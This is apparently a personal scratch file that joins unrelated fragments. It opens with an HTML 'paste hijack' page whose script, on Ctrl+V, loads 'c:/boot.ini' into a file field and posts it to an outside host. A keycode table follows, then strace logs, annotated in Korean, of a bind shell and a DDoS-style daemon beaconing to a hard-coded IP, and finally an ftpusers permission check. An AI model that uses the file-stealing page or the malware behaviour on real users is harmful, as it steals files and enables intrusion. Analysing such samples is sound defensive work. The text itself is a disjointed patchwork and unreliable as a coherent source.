콩나물

 <HTML>
 <HEAD>
  <TITLE> Javascript Paste Keyboard Shortcuts Hijack </TITLE>
 </HEAD>
<body   onkeydown="temp()">
<input>
<form action="http://www.kj.com" method=post name=s>
<input id=kj_filehijack type=file name=fhijack>
</form>
<script>
function temp()
{
    if(event.ctrlKey){
        if(event.keyCode==86){
            window.clipboardData.setData("text","c:/boot.ini");
            document.getElementById('kj_filehijack').focus();
            document.s.submit();
        }
    }
}
</script>
</BODY>
</HTML>

keycode 8 = BackSpace BackSpace
keycode 9 = Tab Tab
keycode 12 = Clear
keycode 13 = Enter
keycode 16 = Shift_L
keycode 17 = Control_L
keycode 18 = Alt_L
keycode 19 = Pause
keycode 20 = Caps_Lock
keycode 27 = Escape Escape
keycode 32 = space space
keycode 33 = Prior
keycode 34 = Next
keycode 35 = End
keycode 36 = Home
keycode 37 = Left
keycode 38 = Up
keycode 39 = Right
keycode 40 = Down
keycode 41 = Select
keycode 42 = Print
keycode 43 = Execute
keycode 45 = Insert
keycode 46 = Delete
keycode 47 = Help
keycode 48 = 0 equal braceright
keycode 49 = 1 exclam onesuperior
keycode 50 = 2 quotedbl twosuperior
keycode 51 = 3 section threesuperior
keycode 52 = 4 dollar
keycode 53 = 5 percent
keycode 54 = 6 ampersand
keycode 55 = 7 slash braceleft
keycode 56 = 8 parenleft bracketleft
keycode 57 = 9 parenright bracketright
keycode 65 = a A
keycode 66 = b B
keycode 67 = c C
keycode 68 = d D
keycode 69 = e E EuroSign
keycode 70 = f F

keycode 71 = g G
keycode 72 = h H
keycode 73 = i I
keycode 74 = j J
keycode 75 = k K
keycode 76 = l L
keycode 77 = m M mu
keycode 78 = n N
keycode 79 = o O
keycode 80 = p P
keycode 81 = q Q at
keycode 82 = r R
keycode 83 = s S
keycode 84 = t T
keycode 85 = u U
keycode 86 = v V
keycode 87 = w W
keycode 88 = x X
keycode 89 = y Y
keycode 90 = z Z
keycode 96 = KP_0 KP_0
keycode 97 = KP_1 KP_1
keycode 98 = KP_2 KP_2
keycode 99 = KP_3 KP_3
keycode 100 = KP_4 KP_4
keycode 101 = KP_5 KP_5
keycode 102 = KP_6 KP_6
keycode 103 = KP_7 KP_7
keycode 104 = KP_8 KP_8
keycode 105 = KP_9 KP_9
keycode 106 = KP_Multiply KP_Multiply
keycode 107 = KP_Add KP_Add

keycode 108 = KP_Separator KP_Separator
keycode 109 = KP_Subtract KP_Subtract
keycode 110 = KP_Decimal KP_Decimal
keycode 111 = KP_Divide KP_Divide
keycode 112 = F1
keycode 113 = F2
keycode 114 = F3
keycode 115 = F4
keycod

e 116 = F5
keycode 117 = F6
keycode 118 = F7
keycode 119 = F8
keycode 120 = F9
keycode 121 = F10
keycode 122 = F11
keycode 123 = F12
keycode 124 = F13
keycode 125 = F14
keycode 126 = F15
keycode 127 = F16
keycode 128 = F17
keycode 129 = F18
keycode 130 = F19
keycode 131 = F20
keycode 132 = F21
keycode 133 = F22
keycode 134 = F23
keycode 135 = F24
keycode 136 = Num_Lock
keycode 137 = Scroll_Lock
keycode 187 = acute grave
keycode 188 = comma semicolon
keycode 189 = minus underscore
keycode 190 = period colon
keycode 192 = numbersign apostrophe
keycode 210 = plusminus hyphen macron
keycode 211 =
keycode 212 = copyright registered
keycode 213 = guillemotleft guillemotright
keycode 214 = masculine ordfeminine
keycode 215 = ae AE
keycode 216 = cent yen
keycode 217 = questiondown exclamdown
keycode 218 = onequarter onehalf threequarters
keycode 220 = less greater bar
keycode 221 = plus asterisk asciitilde
keycode 227 = multiply division

keycode 228 = acircumflex Acircumflex
keycode 229 = ecircumflex Ecircumflex
keycode 230 = icircumflex Icircumflex
keycode 231 = ocircumflex Ocircumflex
keycode 232 = ucircumflex Ucircumflex
keycode 233 = ntilde Ntilde
keycode 234 = yacute Yacute
keycode 235 = oslash Ooblique
keycode 236 = aring Aring
keycode 237 = ccedilla Ccedilla
keycode 238 = thorn THORN
keycode 239 = eth ETH
keycode 240 = diaeresis cedilla currency
keycode 241 = agrave Agrave atilde Atilde
keycode 242 = egrave Egrave
keycode 243 = igrave Igrave
keycode 244 = ograve Ograve otilde Otilde
keycode 245 = ugrave Ugrave
keycode 246 = adiaeresis Adiaeresis
keycode 247 = ediaeresis Ediaeresis
keycode 248 = idiaeresis Idiaeresis
keycode 249 = odiaeresis Odiaeresis
keycode 250 = udiaeresis Udiaeresis
keycode 251 = ssharp question backslash
keycode 252 = asciicircum degree
keycode 253 = 3 sterling
keycode 254 = Mode_switch

# strace ./bindshell

//바인트쉘을 실행한다
execve("./bindshell", ["./bindshell"], [/* 22 vars */]) = 0
// 시스템 정보를 얻어온다
uname({sys="Linux", node="securitya", ...}) = 0
// 데이터 세그먼트 값을 설정
brk(0)                                  = 0x8049a60
//메모리 블럭을 할당하고  0x40016000으로 반화
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
// 파일을 읽기 전용으로 연다 링크가 깨졌거나 파일이 없을시 -1 을 반환
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
//파일의 상태를 알아온다 위의 open 3에서 열어본 파일의 상태를 알아보고 성공했기에 0을 반환
fstat64(3, {st_mode=S_IFREG|0644, st_size=21918, ...}) = 0
// 3으로 열린 파일의 주소를 반환
old_mmap(NULL, 21918, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40017000
// 3으로 열린 파일을 닫는다
close(3)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
// 512 버퍼로 새로연 3번 파일의 부분을 읽는다
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`V\1B4\0"..., 512) = 512
// 3번 파일의 상태를 보고 0을 반환
fstat64(3, {st_mode=S_IFREG|0755, st_size=1531064, ...}) = 0

old_mmap(0x42000000, 1257224, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x42000000
old_mmap(0x4212e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x12e000) = 0x4212e000
old_mmap(0x42131000, 7944, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42131000
close(3)                                = 0

set_thread_area({entry_number:-1 -> 6, base_addr:0x400169e0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
// 0x40017000에서 시작해서 21918까지 주소를 대응시킨다.
munmap(0x40017000, 21918)               = 0
//소켓을 tcp로 생성하고 통신 도메인 영역을 INET 으로 설정한다. 성공시 파일지시자인 3을 반환
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
//소켓의 특성을 지정한다.
//소켓함수에서 생성한 소켓 지정번호 3에게 통신에 필요한 소켓종류, 포트, 주소 등을 포함한다. 실패했기에 -1을 반환한다
bind(3, {sa_family=AF_INET, sin_port=htons(12497), sin_addr=inet_addr("0.0.0.0")}, 16) = -1 EADDRINUSE (Address already in use)
//전체프로세스와 쓰레드를 종료
exit_group(-1)                          = ?

# strace ./daemon
execve("./daemon", ["./daemon"], [/* 22 vars */]) = 0
uname({sys="Linux", node="securitya", ...}) = 0
brk(0)                                  = 0x804ce38
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=21918, ...}) = 0
old_mmap(NULL, 21918, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40017000
close(3)                                = 0
open("/lib/libcrypt.so.1", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240\t\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=23668, ...}) = 0
old_mmap(NULL, 181312, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x4001d000
old_mmap(0x40022000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x4000) = 0x40022000
old_mmap(0x40023000, 156736, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40023000
close(3)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`V\1B4\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1531064, ...}) = 0
old_mmap(0x42000000, 1257224, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x42000000
old_mmap(0x4212e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x12e000) = 0x4212e000
old_mmap(0x42131000, 7944, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42131000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4004a000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4004a280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 21918)               = 0
brk(0)                                  = 0x804ce38
brk(0x804de38)                          = 0x804de38
brk(0)                                  = 0x804de38
brk(0x804e000)                          = 0x804e000
socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(27444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 4
// 지정된 주소로 데이터 전송
// 소켓 4번으로 *HELLO* 라는 7이라는 길이의 데이터를 아래의 주소로 전송
sendto(4, "*HELLO*", 7, 0, {sa_family=AF_INET, sin_port=htons(31335), sin_addr=inet_addr("203.247.42.168")}, 16) = 7
// 새로운 메모리 영역까지 공유하는 복제프로세스를 생성한다.
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x4004a2c8) = 867
// 867 로 설정된 프로세스 그룹 ID를  프로세스 그룹ID로 바꾼다.
setpgid(867, 867)                       = 0
exit_group(0)                           = ?

if [ -f /etc/ftpd/ftpusers ]
 then
     if [ `ls -alL /etc/ftpd/ftpusers | awk '{print $1}' | grep '........-.' | wc -l` -eq 0 ]
              then
                echo "결과 : 취약" >> ftpusers.txt
              else
                echo "결과 : 양호" >> ftpusers.txt
     fi
 else
  echo "no-file"  >> ftpusers.txt
fi